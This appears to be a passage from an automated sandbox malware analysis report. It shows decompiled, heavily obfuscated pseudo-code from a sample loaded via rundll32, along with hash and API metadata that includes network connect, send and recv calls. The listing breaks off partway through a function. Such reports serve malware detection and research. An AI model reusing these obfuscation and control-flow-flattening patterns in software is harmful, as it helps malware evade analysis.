				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				signed int _v192;
				intOrPtr _t445;
				void* _t448;
				intOrPtr _t453;
				signed int _t467;
				intOrPtr _t470;
				intOrPtr _t471;
				void* _t505;
				signed int _t512;
				signed int _t513;
				signed int _t514;
				signed int _t515;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed int _t519;
				signed int _t520;
				intOrPtr* _t521;
				signed int _t524;
				intOrPtr _t529;
				signed int* _t531;
				void* _t533;

				_t471 = __ecx;
				_push(_a8);
				_v104 = __ecx;
				_push(_a4);
				_v12 = __edx;
				_push(__edx);
				_push(__ecx);
				E0017CF25(__edx);
				_v124 = 0x410507;
				_t531 =  &(( &_v192)[4]);
				_v124 = _v124 ^ 0x83a2264d;
				_v124 = _v124 >> 0xa;
				_t470 = 0;
				_t529 = 0;
				_t512 = 0x17;
				_t524 = 0xd582a45;
				_v124 = _v124 * 3;
				_v124 = _v124 ^ 0x0062ea59;
				_v164 = 0x8ee5f4;
				_v164 = _v164 << 0xd;
				_v164 = _v164 ^ 0xc2bd4067;
				_v164 = _v164 + 0xffffa455;
				_v164 = _v164 ^ 0x1e0364bd;
				_v116 = 0xd0c3db;
				_v116 = _v116 + 0x7244;
				_v116 = _v116 + 0xffff5950;
				_v116 = _v116 * 0x7d;
				_v116 = _v116 ^ 0x65d60932;
				_v76 = 0x69c3d0;
				_v76 = _v76 + 0x2803;
				_v76 = _v76 ^ 0x0109b4af;
				_v76 = _v76 ^ 0x016cb6ed;
				_v84 = 0x591f9b;
				_v84 = _v84 ^ 0x136c22a2;
				_v84 = _v84 + 0xbc03;
				_v84 = _v84 ^ 0x133eabdb;
				_v40 = 0x32843;
				_v40 = _v40 + 0x6836;
				_v40 = _v40 ^ 0x000a5f7a;
				_v96 = 0x3c9c05;
				_v96 = _v96 * 0x1a;
				_v96 = _v96 ^ 0xb1c6e809;
				_v96 = _v96 ^ 0xb7e34fe8;
				_v56 = 0xda9312;
				_v56 = _v56 / _t512;
				_v56 = _v56 ^ 0x0000b271;
				_v132 = 0xda0ea8;
				_v132 = _v132 | 0xaeef9bf7;
				_t513 = 0x71;
				_v132 = _v132 / _t513;
				_v132 = _v132 ^ 0x01890540;
				_v44 = 0x61f218;
				_v44 = _v44 + 0xffff41d7;
				_v44 = _v44 ^ 0x006fe265;
				_v144 = 0x306d33;
				_v144 = _v144 + 0xfffff564;
				_v144 = _v144 * 0x6e;
				_v144 = _v144 + 0xffff469c;
				_v144 = _v144 ^ 0x14c9b51d;
				_v52 = 0x70de34;
				_v52 = _v52 << 3;
				_v52 = _v52 ^ 0x038f9e4d;
				_v36 = 0x6cb1ac;
				_v36 = _v36 + 0x1a54;
				_v36 = _v36 ^ 0x00646b3f;
				_v152 = 0x976d54;
				_v152 = _v152 ^ 0x53b4556c;
				_v152 = _v152 ^ 0x5116bac9;
				_v152 = _v152 ^ 0x4d195c93;
				_v152 = _v152 ^ 0x4f27d4c2;
				_v28 = 0x414a88;
				_v28 = _v28 | 0x717fc69d;
				_v28 = _v28 ^ 0x71799fc5;
				_v160 = 0xc7706;
				_v160 = _v160 + 0xc91f;
				_v160 = _v160 | 0xaa894ceb;
				_v160 = _v160 + 0xffffb57b;
				_v160 = _v160 ^ 0xaa88db85;
				_v168 = 0x67f23c;
				_v168 = _v168 ^ 0x8eced2dd;
				_v168 = _v168 ^ 0x27c733d3;
				_v168 = _v168 ^ 0x736125b9;
				_v168 = _v168 ^ 0xda0ef7f2;
				_v176 = 0x85bb3;
				_v176 = _v176 | 0x89ba1603;
				_v176 = _v176 >> 8;
				_t514 = 0x6a;
				_v176 = _v176 / _t514;
				_v176 = _v176 ^ 0x0009ce33;
				_v136 = 0xb0a921;
				_v136 = _v136 ^ 0x2367151f;
				_v136 = _v136 ^ 0x64865221;
				_t515 = 0x35;
				_v136 = _v136 * 0x3f;
				_v136 = _v136 ^ 0x8d2b953d;
				_v148 = 0x2df722;
				_v148 = _v148 * 0x30;
				_v148 = _v148 + 0xd30d;
				_v148 = _v148 | 0x68c8f2ae;
				_v148 = _v148 ^ 0x68db5c3d;
				_v92 = 0xa4f97a;
				_v92 = _v92 ^ 0x325a0e28;
				_v92 = _v92 + 0x57de;
				_v92 = _v92 ^ 0x32f51d21;
				_v32 = 0xa83f00;
				_v32 = _v32 + 0xffff47e2;
				_v32 = _v32 ^ 0x00a2bde7;
				_v156 = 0xe5ea35;
				_t178 =  &_v156; // 0xe5ea35
				_v156 =  *_t178 / _t515;
				_v156 = _v156 << 5;
				_v156 = _v156 + 0x3621;
				_v156 = _v156 ^ 0x008c998d;
				_v180 = 0x37bb8c;
				_v180 = _v180 ^ 0x8c6790c9;
				_t516 = 0x3c;
				_v180 = _v180 * 0x44;
				_v180 = _v180 | 0x3ef8ecb7;
				_v180 = _v180 ^ 0x7ff3e314;
				_v88 = 0x10d686;
				_v88 = _v88 + 0xffff44b6;
				_v88 = _v88 / _t516;
				_v88 = _v88 ^ 0x000573bd;
				_v64 = 0x2cf4a8;
				_v64 = _v64 << 0xb;
				_v64 = _v64 + 0xffff4c9b;
				_v64 = _v64 ^ 0x67a6f27b;
				_v188 = 0x434d7c;
				_t218 =  &_v188; // 0x434d7c
				_v188 =  *_t218 * 0x14;
				_v188 = _v188 + 0xffff53dc;
				_v188 = _v188 * 0x58;
				_v188 = _v188 ^ 0xce78d82e;
				_v48 = 0x39a498;
				_v48 = _v48 + 0xd90b;
				_v48 = _v48 ^ 0x00328937;
				_v172 = 0x329194;
				_v172 = _v172 + 0x15c2;
				_v172 = _v172 ^ 0x8846dc1f;
				_v172 = _v172 + 0x561;
				_v172 = _v172 ^ 0x8878b13b;
				_v140 = 0x921bc4;
				_v140 = _v140 | 0xc689e64a;
				_v140 = _v140 >> 0xc;
				_v140 = _v140 ^ 0x67a6be9d;
				_v140 = _v140 ^ 0x67a0761b;
				_v72 = 0xa3a418;
				_t517 = 0x26;
				_v72 = _v72 * 0x26;
				_v72 = _v72 >> 0x10;
				_v72 = _v72 ^ 0x0002c06b;
				_v108 = 0xd1ae1a;
				_v108 = _v108 ^ 0x567f87f9;
				_v108 = _v108 | 0x0eb5e220;
				_v108 = _v108 ^ 0x558f672f;
				_v108 = _v108 ^ 0x0b3c3f9a;
				_v80 = 0x5d29a8;
				_v80 = _v80 | 0x5a2f4123;
				_v80 = _v80 / _t517;
				_v80 = _v80 ^ 0x0265326d;
				_v184 = 0x50dc21;
				_v184 = _v184 + 0xffff863b;
				_v184 = _v184 + 0xffff7ebb;
				_v184 = _v184 + 0x5f54;
				_v184 = _v184 ^ 0x005a5f37;
				_v68 = 0x13fcd3;
				_v68 = _v68 + 0x7ca8;
				_v68 = _v68 >> 3;
				_v68 = _v68 ^ 0x000ac947;
				_v24 = 0xc2d10f;
				_v24 = _v24 + 0xffff657d;
				_v24 = _v24 ^ 0x00c52471;
				_v192 = 0x48c156;
				_v192 = _v192 >> 4;
				_t518 = 0x2f;
				_v192 = _v192 * 0x2f;
				_v192 = _v192 + 0xffffa98f;
				_v192 = _v192 ^ 0x00d9c1bc;
				_v112 = 0xb16c9;
				_v112 = _v112 >> 0xe;
				_v112 = _v112 << 0x10;
				_v112 = _v112 / _t518;
				_v112 = _v112 ^ 0x00028b59;
				_v120 = 0x2563ad;
				_t519 = 0x30;
				_v120 = _v120 / _t519;
				_v120 = _v120 + 0xffffe9b6;
				_v120 = _v120 >> 8;
				_v120 = _v120 ^ 0x000e86e4;
				_v60 = 0x629492;
				_t520 = 0x32;
				_v60 = _v60 / _t520;
				_v60 = _v60 << 0xa;
				_v60 = _v60 ^ 0x07e42de9;
				_v128 = 0x197221;
				_v128 = _v128 >> 0xf;
				_v128 = _v128 << 1;
				_v128 = _v128 * 0x2e;
				_v128 = _v128 ^ 0x0004057d;
				_t521 = _v16;
				while(1) {
					L1:
					goto L2;
					do {
						while(1) {
							L2:
							_t533 = _t524 - 0x94e79b7;
							if(_t533 > 0) {
								break;
							}
							if(_t533 == 0) {
								_push(_t471);
								_push(_t471);
								_t445 = E00183512(0x20000);
								_t470 = _t445;
								if(_t470 != 0) {
									_t524 = 0x4150ae2;
									goto L12;
								}
							} else {
								if(_t524 == 0x35d4444) {
									_t453 = E00172E96(_v148, _v92, _v32, _v116, _v156,  *_t521, _v12);
									_t471 = _v104;
									_t531 =  &(_t531[5]);
									_v20 = _t453;
									_t505 = 0x812254d;
									_t524 =  !=  ? 0x812254d : 0x4f6d4ac;
									continue;
								} else {
									if(_t524 == 0x4150ae2) {
										_push(_t471);
										_push(_t471);
										_t529 = E00183512(0x2000);
										_t524 =  !=  ? 0xd2f1d9f : 0x98aa4b1;
										goto L12;
									} else {
										if(_t524 == 0x4f6d4ac) {
											_t521 = _t521 + 0x2c;
											asm("sbb esi, esi");
											_t524 = (_t524 & 0xf5c6e621) + 0xd965e23;
											continue;
										} else {
											if(_t524 == 0x53e4020) {
												E00188CD6(_v164, _t471, _t529, _v108, _v80);
												_t531 =  &(_t531[3]);
												L11:
												_t524 = 0xd965e23;
												L12:
												L13:
												_t471 = _v104;
												goto L1;
											} else {
												if(_t524 == _t505) {
													E001795C9(_t529,  &_v8, _v180, _v124, _v20, _v88, _v64, _v188);
													_t524 =  !=  ? 0x53e4020 : 0x4f6d4ac;
													E0018E689(_v48, _v172, _v140, _v20, _v72);
													_t531 =  &(_t531[0xa]);
													L28:
													_t471 = _v104;
													_t505 = 0x812254d;
												}
												goto L29;
											}
										}
									}
								}
							}
							goto L30;
						}
						if(_t524 == 0x98aa4b1) {
							E001768DE(_v112, _v120, _v60, _v128, _t470);
							_t531 =  &(_t531[3]);
							_t524 = 0x34e8be;
							goto L28;
						} else {
							if(_t524 == 0xd2f1d9f) {
								_t473 = _v44;
								_t448 = E0018E9E9(_v44, _v144, _v52,  &_v16, _v36, _v152,  &_v4, _v12, _v28, _t471, _t471, _v160, _t471, _t471, _v168, _t471, _v176, _t471, _t470);
								_t531 =  &(_t531[0x11]);
								if(_t448 == 0) {
									goto L11;
								} else {
									_t467 = E00175AE2(_t473);
									_t524 = 0x35d4444;
									_v100 = _v16 * 0x2c + _t470;
									_t521 =  >=  ? _t470 : (_t467 & 0x0000001f) * 0x2c + _t470;
									goto L13;
								}
								L31:
							} else {
								if(_t524 == 0xd582a45) {
									_t524 = 0x94e79b7;
									goto L2;
								} else {
									if(_t524 != 0xd965e23) {
										goto L29;
									} else {
										E001768DE(_v184, _v68, _v24, _v192, _t529);
										_t531 =  &(_t531[3]);
										_t524 = 0x98aa4b1;
										goto L12;
									}
								}
							}
						}
						break;
						L29:
						_t445 = _v100;
					} while (_t524 != 0x34e8be);
					L30:
					return _t445;
					goto L31;
				}
			}








































































                                                                                                                      0x0018ee94
                                                                                                                      0x0018ee9e
                                                                                                                      0x0018eea7
                                                                                                                      0x0018eeab
                                                                                                                      0x0018eeb2
                                                                                                                      0x0018eeb9
                                                                                                                      0x0018eeba
                                                                                                                      0x0018eebb
                                                                                                                      0x0018eec0
                                                                                                                      0x0018eec8
                                                                                                                      0x0018eecb
                                                                                                                      0x0018eed5
                                                                                                                      0x0018eeda
                                                                                                                      0x0018eee1
                                                                                                                      0x0018eee5
                                                                                                                      0x0018eee8
                                                                                                                      0x0018eeed
                                                                                                                      0x0018eef1
                                                                                                                      0x0018eef9
                                                                                                                      0x0018ef01
                                                                                                                      0x0018ef06
                                                                                                                      0x0018ef0e
                                                                                                                      0x0018ef16
                                                                                                                      0x0018ef1e
                                                                                                                      0x0018ef26
                                                                                                                      0x0018ef2e
                                                                                                                      0x0018ef3b
                                                                                                                      0x0018ef3f
                                                                                                                      0x0018ef47
                                                                                                                      0x0018ef52
                                                                                                                      0x0018ef5d
                                                                                                                      0x0018ef68
                                                                                                                      0x0018ef73
                                                                                                                      0x0018ef7e
                                                                                                                      0x0018ef89
                                                                                                                      0x0018ef94
                                                                                                                      0x0018ef9f
                                                                                                                      0x0018efaa
                                                                                                                      0x0018efb5
                                                                                                                      0x0018efc0
                                                                                                                      0x0018efcd
                                                                                                                      0x0018efd1
                                                                                                                      0x0018efd9
                                                                                                                      0x0018efe1
                                                                                                                      0x0018eff7
                                                                                                                      0x0018effe
                                                                                                                      0x0018f009
                                                                                                                      0x0018f011
                                                                                                                      0x0018f01d
                                                                                                                      0x0018f020
                                                                                                                      0x0018f024
                                                                                                                      0x0018f02c
                                                                                                                      0x0018f037
                                                                                                                      0x0018f042
                                                                                                                      0x0018f04d
                                                                                                                      0x0018f055
                                                                                                                      0x0018f062
                                                                                                                      0x0018f066
                                                                                                                      0x0018f06e
                                                                                                                      0x0018f076
                                                                                                                      0x0018f081
                                                                                                                      0x0018f089
                                                                                                                      0x0018f094
                                                                                                                      0x0018f09f
                                                                                                                      0x0018f0aa
                                                                                                                      0x0018f0b5
                                                                                                                      0x0018f0bf
                                                                                                                      0x0018f0c7
                                                                                                                      0x0018f0cf
                                                                                                                      0x0018f0d7
                                                                                                                      0x0018f0df
                                                                                                                      0x0018f0ea
                                                                                                                      0x0018f0f5
                                                                                                                      0x0018f100
                                                                                                                      0x0018f108
                                                                                                                      0x0018f110
                                                                                                                      0x0018f118
                                                                                                                      0x0018f120
                                                                                                                      0x0018f128
                                                                                                                      0x0018f130
                                                                                                                      0x0018f138
                                                                                                                      0x0018f140
                                                                                                                      0x0018f148
                                                                                                                      0x0018f150
                                                                                                                      0x0018f158
                                                                                                                      0x0018f160
                                                                                                                      0x0018f16b
                                                                                                                      0x0018f170
                                                                                                                      0x0018f176
                                                                                                                      0x0018f17e
                                                                                                                      0x0018f186
                                                                                                                      0x0018f18e
                                                                                                                      0x0018f19b
                                                                                                                      0x0018f19e
                                                                                                                      0x0018f1a2
                                                                                                                      0x0018f1aa
                                                                                                                      0x0018f1b7
                                                                                                                      0x0018f1bb
                                                                                                                      0x0018f1c3
                                                                                                                      0x0018f1cb
                                                                                                                      0x0018f1d3
                                                                                                                      0x0018f1db
                                                                                                                      0x0018f1e3
                                                                                                                      0x0018f1eb
                                                                                                                      0x0018f1f3
                                                                                                                      0x0018f1fe
                                                                                                                      0x0018f209
                                                                                                                      0x0018f214
                                                                                                                      0x0018f21c
                                                                                                                      0x0018f224
                                                                                                                      0x0018f228
                                                                                                                      0x0018f22d
                                                                                                                      0x0018f235
                                                                                                                      0x0018f23d
                                                                                                                      0x0018f245
                                                                                                                      0x0018f252
                                                                                                                      0x0018f253
                                                                                                                      0x0018f257
                                                                                                                      0x0018f25f
                                                                                                                      0x0018f267
                                                                                                                      0x0018f26f
                                                                                                                      0x0018f27d
                                                                                                                      0x0018f281
                                                                                                                      0x0018f289
                                                                                                                      0x0018f294
                                                                                                                      0x0018f29c
                                                                                                                      0x0018f2a7
                                                                                                                      0x0018f2b2
                                                                                                                      0x0018f2ba
                                                                                                                      0x0018f2bf
                                                                                                                      0x0018f2c3
                                                                                                                      0x0018f2d0
                                                                                                                      0x0018f2d6
                                                                                                                      0x0018f2de
                                                                                                                      0x0018f2e9
                                                                                                                      0x0018f2f4
                                                                                                                      0x0018f2ff
                                                                                                                      0x0018f307
                                                                                                                      0x0018f30f
                                                                                                                      0x0018f317
                                                                                                                      0x0018f31f
                                                                                                                      0x0018f327
                                                                                                                      0x0018f32f
                                                                                                                      0x0018f337
                                                                                                                      0x0018f33c
                                                                                                                      0x0018f344
                                                                                                                      0x0018f34c
                                                                                                                      0x0018f361
                                                                                                                      0x0018f364
                                                                                                                      0x0018f36b
                                                                                                                      0x0018f373
                                                                                                                      0x0018f37e
                                                                                                                      0x0018f386
                                                                                                                      0x0018f38e
                                                                                                                      0x0018f396
                                                                                                                      0x0018f39e
                                                                                                                      0x0018f3a6
                                                                                                                      0x0018f3b1
                                                                                                                      0x0018f3c7
                                                                                                                      0x0018f3ce
                                                                                                                      0x0018f3d9
                                                                                                                      0x0018f3e1
                                                                                                                      0x0018f3e9
                                                                                                                      0x0018f3f1
                                                                                                                      0x0018f3f9
                                                                                                                      0x0018f401
                                                                                                                      0x0018f40c
                                                                                                                      0x0018f417
                                                                                                                      0x0018f41f
                                                                                                                      0x0018f42a
                                                                                                                      0x0018f435
                                                                                                                      0x0018f440
                                                                                                                      0x0018f44b
                                                                                                                      0x0018f453
                                                                                                                      0x0018f45d
                                                                                                                      0x0018f460
                                                                                                                      0x0018f464
                                                                                                                      0x0018f46c
                                                                                                                      0x0018f474
                                                                                                                      0x0018f47c
                                                                                                                      0x0018f481
                                                                                                                      0x0018f48e
                                                                                                                      0x0018f492
                                                                                                                      0x0018f49a
                                                                                                                      0x0018f4a6
                                                                                                                      0x0018f4ab
                                                                                                                      0x0018f4b1
                                                                                                                      0x0018f4b9
                                                                                                                      0x0018f4be
                                                                                                                      0x0018f4c6
                                                                                                                      0x0018f4d8
                                                                                                                      0x0018f4db
                                                                                                                      0x0018f4e2
                                                                                                                      0x0018f4ea
                                                                                                                      0x0018f4f5
                                                                                                                      0x0018f4fd
                                                                                                                      0x0018f502
                                                                                                                      0x0018f50b
                                                                                                                      0x0018f50f
                                                                                                                      0x0018f517
                                                                                                                      0x0018f522
                                                                                                                      0x0018f522
                                                                                                                      0x0018f522
                                                                                                                      0x0018f527
                                                                                                                      0x0018f527
                                                                                                                      0x0018f527
                                                                                                                      0x0018f527
                                                                                                                      0x0018f52d
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x0018f533
                                                                                                                      0x0018f6ab
                                                                                                                      0x0018f6ac
                                                                                                                      0x0018f6b2
                                                                                                                      0x0018f6b7
                                                                                                                      0x0018f6bd
                                                                                                                      0x0018f6c3
                                                                                                                      0x00000000
                                                                                                                      0x0018f6c3
                                                                                                                      0x0018f539
                                                                                                                      0x0018f53f
                                                                                                                      0x0018f66e
                                                                                                                      0x0018f673
                                                                                                                      0x0018f677
                                                                                                                      0x0018f67c
                                                                                                                      0x0018f68c
                                                                                                                      0x0018f691
                                                                                                                      0x00000000
                                                                                                                      0x0018f545
                                                                                                                      0x0018f54b
                                                                                                                      0x0018f62a
                                                                                                                      0x0018f62b
                                                                                                                      0x0018f636
                                                                                                                      0x0018f646
                                                                                                                      0x00000000
                                                                                                                      0x0018f551
                                                                                                                      0x0018f557
                                                                                                                      0x0018f603
                                                                                                                      0x0018f608
                                                                                                                      0x0018f610
                                                                                                                      0x00000000
                                                                                                                      0x0018f55d
                                                                                                                      0x0018f564
                                                                                                                      0x0018f5e9
                                                                                                                      0x0018f5ee
                                                                                                                      0x0018f5f1
                                                                                                                      0x0018f5f1
                                                                                                                      0x0018f5f6
                                                                                                                      0x0018f5fa
                                                                                                                      0x0018f5fa
                                                                                                                      0x00000000
                                                                                                                      0x0018f566
                                                                                                                      0x0018f568
                                                                                                                      0x0018f599
                                                                                                                      0x0018f5c0
                                                                                                                      0x0018f5ca
                                                                                                                      0x0018f5cf
                                                                                                                      0x0018f7d8
                                                                                                                      0x0018f7d8
                                                                                                                      0x0018f7dc
                                                                                                                      0x0018f7dc
                                                                                                                      0x00000000
                                                                                                                      0x0018f568
                                                                                                                      0x0018f564
                                                                                                                      0x0018f557
                                                                                                                      0x0018f54b
                                                                                                                      0x0018f53f
                                                                                                                      0x00000000
                                                                                                                      0x0018f533
                                                                                                                      0x0018f6d3
                                                                                                                      0x0018f7cb
                                                                                                                      0x0018f7d0
                                                                                                                      0x0018f7d3
                                                                                                                      0x00000000
                                                                                                                      0x0018f6d9
                                                                                                                      0x0018f6df
                                                                                                                      0x0018f772
                                                                                                                      0x0018f779
                                                                                                                      0x0018f77e
                                                                                                                      0x0018f783
                                                                                                                      0x00000000
                                                                                                                      0x0018f789
                                                                                                                      0x0018f78d
                                                                                                                      0x0018f795
                                                                                                                      0x0018f7ab
                                                                                                                      0x0018f7af
                                                                                                                      0x00000000
                                                                                                                      0x0018f7af
                                                                                                                      0x00000000
                                                                                                                      0x0018f6e1
                                                                                                                      0x0018f6e7
                                                                                                                      0x0018f71e
                                                                                                                      0x00000000
                                                                                                                      0x0018f6e9
                                                                                                                      0x0018f6ef
                                                                                                                      0x00000000
                                                                                                                      0x0018f6f5
                                                                                                                      0x0018f70c
                                                                                                                      0x0018f711
                                                                                                                      0x0018f714
                                                                                                                      0x00000000
                                                                                                                      0x0018f714
                                                                                                                      0x0018f6ef
                                                                                                                      0x0018f6e7
                                                                                                                      0x0018f6df
                                                                                                                      0x00000000
                                                                                                                      0x0018f7e1
                                                                                                                      0x0018f7e1
                                                                                                                      0x0018f7e5
                                                                                                                      0x0018f7fb
                                                                                                                      0x0018f7fb
                                                                                                                      0x00000000
                                                                                                                      0x0018f7fb

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471331786.0000000000171000.00000020.00000800.00020000.00000000.sdmp, Offset: 00170000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471327139.0000000000170000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471344623.0000000000195000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_170000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #A/Z$3m0$5$7_Z$?kd$Dr$E*X$E*X$Yb$eo$|MC
                                                                                                                      • API String ID: 0-1059594742
                                                                                                                      • Opcode ID: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction ID: a7251ec82955050c7f7e94f88e3c12564ce339474ff10d0ccbd494ff38478e04
                                                                                                                      • Opcode Fuzzy Hash: 17c914c607d4fd6e8b14c60ccda3ed0ff62bbfef5d0e6b580ac1b24a080d4d8a
                                                                                                                      • Instruction Fuzzy Hash: 3F2210719083809FE368DF25C58AA4FFBE1BBC4714F108A2DE5D996260E7B18949CF53
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 10012C30 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 156networkCOMMON
                                                                                                                      Download Yara Rule
                                                                                                                      APIs
                                                                                                                      • _memset.LIBCMT ref: 10012C6C
                                                                                                                      • connect.WS2_32(?,?,00000010), ref: 10012CA7
                                                                                                                      • _strcat.LIBCMT ref: 10012CE9
                                                                                                                      • send.WS2_32(?,?,00000064,00000000), ref: 10012D06
                                                                                                                      • recv.WS2_32(000000FF,?,00000064,00000000), ref: 10012D9D
                                                                                                                        • Part of subcall function 1001DDF4: IsWindow.USER32(?), ref: 1001DE03
                                                                                                                        • Part of subcall function 1001DECA: EnableWindow.USER32(?,10046640), ref: 1001DED7
                                                                                                                        • Part of subcall function 1001DD46: GetDlgItem.USER32(?,59F9C18A), ref: 1001DD53
                                                                                                                        • Part of subcall function 1001DDF4: SetWindowTextA.USER32(?,00000064), ref: 1001DE2B
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.471453842.0000000010001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 10000000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.471449421.0000000010000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471478621.0000000010046000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471486430.0000000010053000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471491680.0000000010057000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.471497117.000000001005A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_10000000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID: Window$EnableItemText_memset_strcatconnectrecvsend
                                                                                                                      • String ID: Connected$Disconnected$Wait...
                                                                                                                      • API String ID: 2263617321-2304371739
                                                                                                                      • Opcode ID: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction ID: 6a29e3ac87f5f9b0e95b07577220059068a2bdb443e3840c63f2d59567e72b14
                                                                                                                      • Opcode Fuzzy Hash: d48f4256781d7f2df666ac26c57b600e12e739e225c0d9a3066db47a13ab057d
                                                                                                                      • Instruction Fuzzy Hash: 26513DB4A002189BDB14EBA8CC95BEEB7B1FF48308F104169E5066F2C2DF75A991CF44
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0017472E Relevance: 13.2, Strings: 10, Instructions: 679COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 95%
                                                                                                                      			E0017472E(void* __ecx) {
				char _v524;
				char _v1044;
				char _v1564;
				char _v2084;
				char _v2604;
				intOrPtr _v2608;
				intOrPtr _v2612;
				char _v2616;
				intOrPtr _v2620;
				char _v2624;
				signed int _v2628;
				signed int _v2632;
				signed int _v2636;
				signed int _v2640;
				signed int _v2644;
				signed int _v2648;
				signed int _v2652;
				signed int _v2656;
				signed int _v2660;
				signed int _v2664;
				signed int _v2668;
				signed int _v2672;
				signed int _v2676;
				signed int _v2680;
				signed int _v2684;
				signed int _v2688;
				signed int _v2692;
				signed int _v2696;
				signed int _v2700;
				signed int _v2704;
				signed int _v2708;
				signed int _v2712;
				signed int _v2716;
				signed int _v2720;
				signed int _v2724;
				signed int _v2728;
				signed int _v2732;
				signed int _v2736;
				signed int _v2740;
				signed int _v2744;
				signed int _v2748;
				signed int _v2752;
				signed int _v2756;
				signed int _v2760;
				signed int _v2764;
				signed int _v2768;
				signed int _v2772;
				signed int _v2776;
				signed int _v2780;
				signed int _v2784;
				signed int _v2788;
				signed int _v2792;
				signed int _v2796;
				signed int _v2800;
				signed int _v2804;
				signed int _v2808;
				signed int _v2812;
				signed int _v2816;
				signed int _v2820;
				signed int _v2824;
				signed int _v2828;
				signed int _v2832;
				signed int _v2836;
				signed int _v2840;
				signed int _v2844;
				signed int _v2848;
				signed int _v2852;
				signed int _v2856;
				signed int _v2860;
				signed int _v2864;
				signed int _v2868;
				signed int _v2872;
				signed int _v2876;
				signed int _v2880;
				signed int _v2884;
				signed int _v2888;
				signed int _v2892;
				signed int _v2896;
				signed int _v2900;
				signed int _v2904;
				signed int _v2908;
				signed int _v2912;
				signed int _v2916;
				signed int _v2920;
				signed int _v2924;
				signed int _v2928;
				signed int _v2932;
				signed int _v2936;
				signed int _v2940;
				signed int _t797;
				void* _t798;
				void* _t812;
				signed int _t830;
				signed int _t832;
				signed int _t833;
				signed int _t834;
				signed int _t835;
				signed int _t836;
				signed int _t837;
				signed int _t838;
				signed int _t839;
				signed int _t840;
				signed int _t841;
				signed int _t842;
				signed int _t843;
				signed int _t844;
				signed int _t845;
				signed int _t846;
				signed int _t847;
				signed int _t848;
				signed int _t849;
				signed int _t850;
				signed int _t851;
				signed int _t852;
				signed int _t858;
				signed int _t930;
				signed int _t931;
				void* _t936;
				signed int* _t937;
				void* _t945;

				_t937 =  &_v2940;
				_v2888 = 0x58ed27;
				_v2888 = _v2888 | 0x83563905;
				_v2888 = _v2888 * 0x46;
				_t936 = __ecx;
				_t931 = 0x63d9dbc;
				_t832 = 0x70;
				_v2888 = _v2888 * 0x21;
				_v2888 = _v2888 ^ 0x6b204dc3;
				_v2700 = 0xe9de42;
				_v2700 = _v2700 >> 0xa;
				_v2700 = _v2700 ^ 0x00103a77;
				_v2936 = 0x549012;
				_v2936 = _v2936 + 0x60a5;
				_v2936 = _v2936 >> 7;
				_v2936 = _v2936 | 0x1d415c41;
				_v2936 = _v2936 ^ 0x1d4ed04e;
				_v2808 = 0xe235c3;
				_v2808 = _v2808 >> 0x10;
				_v2808 = _v2808 ^ 0xf71055a5;
				_v2808 = _v2808 ^ 0xf7181377;
				_v2788 = 0x4c3834;
				_v2788 = _v2788 >> 0xa;
				_v2788 = _v2788 + 0x8e2;
				_v2788 = _v2788 ^ 0x000a3430;
				_v2844 = 0x57ca8b;
				_v2844 = _v2844 ^ 0xd732e8d9;
				_v2844 = _v2844 << 4;
				_v2844 = _v2844 ^ 0x7657b035;
				_v2920 = 0x3116bc;
				_v2920 = _v2920 / _t832;
				_v2920 = _v2920 << 7;
				_v2920 = _v2920 | 0xbaa7d477;
				_v2920 = _v2920 ^ 0xbab318b9;
				_v2864 = 0x147254;
				_v2864 = _v2864 >> 0x10;
				_v2864 = _v2864 ^ 0xe9282c9a;
				_t833 = 0x42;
				_v2864 = _v2864 * 0x67;
				_v2864 = _v2864 ^ 0xcf208e56;
				_v2628 = 0x43de16;
				_v2628 = _v2628 / _t833;
				_v2628 = _v2628 ^ 0x00078ced;
				_v2880 = 0xe32302;
				_v2880 = _v2880 << 0xa;
				_t834 = 0x66;
				_v2880 = _v2880 / _t834;
				_v2880 = _v2880 | 0x6d622614;
				_v2880 = _v2880 ^ 0x6d625826;
				_v2904 = 0x214f4b;
				_t835 = 0x64;
				_v2904 = _v2904 / _t835;
				_v2904 = _v2904 << 7;
				_v2904 = _v2904 ^ 0x5c13da49;
				_v2904 = _v2904 ^ 0x5c3fedf9;
				_v2632 = 0x15dffa;
				_v2632 = _v2632 | 0xc7418eca;
				_v2632 = _v2632 ^ 0xc75c6c30;
				_v2692 = 0x7a9c1f;
				_v2692 = _v2692 >> 9;
				_v2692 = _v2692 ^ 0x00075ef2;
				_v2840 = 0xf91be9;
				_v2840 = _v2840 << 0xb;
				_v2840 = _v2840 >> 0xc;
				_v2840 = _v2840 ^ 0x00055b58;
				_v2684 = 0x12d980;
				_v2684 = _v2684 ^ 0x93e0c374;
